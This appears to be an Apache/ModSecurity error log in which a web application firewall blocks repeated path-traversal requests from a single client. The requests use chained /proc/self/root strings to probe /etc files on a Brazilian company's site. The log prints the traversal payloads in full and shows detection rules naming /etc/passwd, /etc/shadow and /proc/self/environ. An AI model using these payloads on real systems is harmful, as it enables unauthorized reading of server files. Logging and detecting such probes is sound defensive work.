[Fri Mar 20 08:27:12.458245 2026] [:error] [pid 11642:tid 140411725141760] [client 74.7.243.128:43348] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vELninkcc-iUj5Api_wAAA4I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:27:13.775276 2026] [:error] [pid 7893:tid 140411624429312] [client 74.7.243.128:40538] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vERCii7xarUs8iHZsBQAAAg4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:27:14.242761 2026] [:error] [pid 7893:tid 140411548894976] [client 74.7.243.128:40548] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/hosts.allow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vEhCii7xarUs8iHZsBwAAAhc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:27:15.495008 2026] [:error] [pid 9818:tid 140411582465792] [client 74.7.243.128:40550] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/grep_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vE11pVZ5mVmJwsFM2AgAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:27:16.801352 2026] [:error] [pid 9818:tid 140411574073088] [client 74.7.243.128:40562] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vFF1pVZ5mVmJwsFM2CQAAAFQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:27:18.120655 2026] [:error] [pid 31215:tid 140411649607424] [client 74.7.243.128:40568] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vFgF0L0L-SsrnPo5tkQAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:27:19.464714 2026] [:error] [pid 31215:tid 140411582465792] [client 74.7.243.128:44680] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vFwF0L0L-SsrnPo5tlgAAAtM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:27:22.365008 2026] [:error] [pid 7893:tid 140411616036608] [client 74.7.243.128:44690] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vGhCii7xarUs8iHZsDQAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:27:23.771089 2026] [:error] [pid 7893:tid 140411658000128] [client 74.7.243.128:44700] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vGxCii7xarUs8iHZsDgAAAgo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:27:25.051951 2026] [:error] [pid 11167:tid 140411708356352] [client 74.7.243.128:44704] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vHfHIg5MgXLBnicP8YgAAAcQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:27:26.239006 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.243.128:44718] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vHuoXxyEfFpUF8f-FewAAAVU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:27:27.507443 2026] [:error] [pid 7235:tid 140411632822016] [client 74.7.243.128:44724] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vH_qxLDW4GITHUkTtxQAAAQ0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:27:28.821043 2026] [:error] [pid 9818:tid 140411599251200] [client 74.7.243.128:44736] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vIF1pVZ5mVmJwsFM2EQAAAFE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:27:30.543488 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.243.128:45100] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vIuoXxyEfFpUF8f-FhAAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:27:31.833494 2026] [:error] [pid 7893:tid 140411557287680] [client 74.7.243.128:45114] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vIxCii7xarUs8iHZsEQAAAhY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:27:33.198672 2026] [:error] [pid 7893:tid 140411548894976] [client 74.7.243.128:45130] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vJRCii7xarUs8iHZsEgAAAhc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:27:34.507363 2026] [:error] [pid 7893:tid 140411674785536] [client 74.7.243.128:45132] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vJhCii7xarUs8iHZsFAAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:27:38.036172 2026] [:error] [pid 11167:tid 140411540502272] [client 74.7.243.128:45138] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vKvHIg5MgXLBnicP8aAAAAdg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:27:38.571861 2026] [:error] [pid 11167:tid 140411691570944] [client 74.7.243.128:45138] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vKvHIg5MgXLBnicP8aQAAAcY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:27:41.084668 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.243.128:40784] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vLda6ubjKNq_cu4bZ3QAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:27:43.887497 2026] [:error] [pid 11167:tid 140411683178240] [client 74.7.243.128:40796] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vL_HIg5MgXLBnicP8cAAAAcc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:27:47.482056 2026] [:error] [pid 10189:tid 140411699963648] [client 74.7.243.128:40808] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0vMzJ3M9BSuKP7CAYiEQAAAIU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
